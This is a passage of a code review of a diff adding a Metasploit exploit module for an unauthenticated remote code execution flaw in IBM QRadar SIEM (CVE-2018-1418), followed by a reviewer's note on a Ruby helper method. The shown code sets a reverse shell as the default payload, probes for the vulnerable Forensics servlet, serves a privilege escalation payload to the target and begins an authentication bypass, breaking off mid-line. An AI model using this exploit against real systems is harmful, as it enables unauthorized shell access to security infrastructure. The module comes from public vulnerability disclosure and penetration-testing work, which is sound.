modules/exploits/linux/http/ibm_qradar_unauth_rce.rb

```diff
@@ -0,0 +1,221 @@
+        the next minute.
+        Details about these vulnerabilities can be found in the advisories listed in References.
+
+        The Forensics web application is disabled in QRadar Community Edition, but the code still works,
+        so these vulnerabilities can be exploited in all flavours of QRadar.
+        This module was tested with IBM QRadar CE 7.3.0 and 7.3.1. Most likely all versions released since
+        mid 2014 are vulnerable, as that was when the Forensics application was introduced.
+
+        Due to payload constraints, this module only runs a generic/shell_reverse_tcp payload.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+         ['CVE', '2018-1418'],
+         ['URL', 'https://blogs.securiteam.com/index.php/archives/3689'],
+         ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt'],
+         ['URL', 'FULLDISC_URL']
+        ],
+      'Targets'        =>
+        [
+          [ 'IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 27', {} ],
+        ],
+      'Payload'        => {
+        'Compat'       => {
+          'ConnectionType'  => 'reverse',
+        }
+      },
+      'DefaultOptions'  => {
+        'SSL'     => true,
+        # we can only run shell scripts, so set a reverse netcat payload by default
+        # the payload that will be run is in the first few lines of @payload
+        'PAYLOAD' => 'generic/shell_reverse_tcp',
+      },
+      'DisclosureDate'  => 'May 28 2018',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('SRVHOST', [true, 'HTTP server address', '0.0.0.0']),
+        OptString.new('SRVPORT', [true, 'HTTP server port', '4448']),
+      ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri'       => '/ForensicsAnalysisServlet/',
+        'method'    => 'GET',
+      })
+      if res && res.code == 403
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+
+  # Handle incoming requests from QRadar
+  def on_request_uri(cli, request)
+    print_good("#{peer} - Sending privilege escalation payload to QRadar...")
+    print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
+    send_response(cli, @payload)
+  end
+
+
+  # step 1 of the exploit, bypass authentication in the ForensicAnalysisServlet
+  def set_cookies
+    @sec_cookie = SecureRandom.uuid
+    @csrf_cookie = SecureRandom.uuid
+
+    post_data = "#{rand_text_alpha(rand(12)+5)},#{rand_text_alpha(rand(12)+5)}," +
```

Comment:
A change was made to the `rand_text_*` methods not long ago. Now you can do this:

```ruby
rand_text_alpha(5..17)
```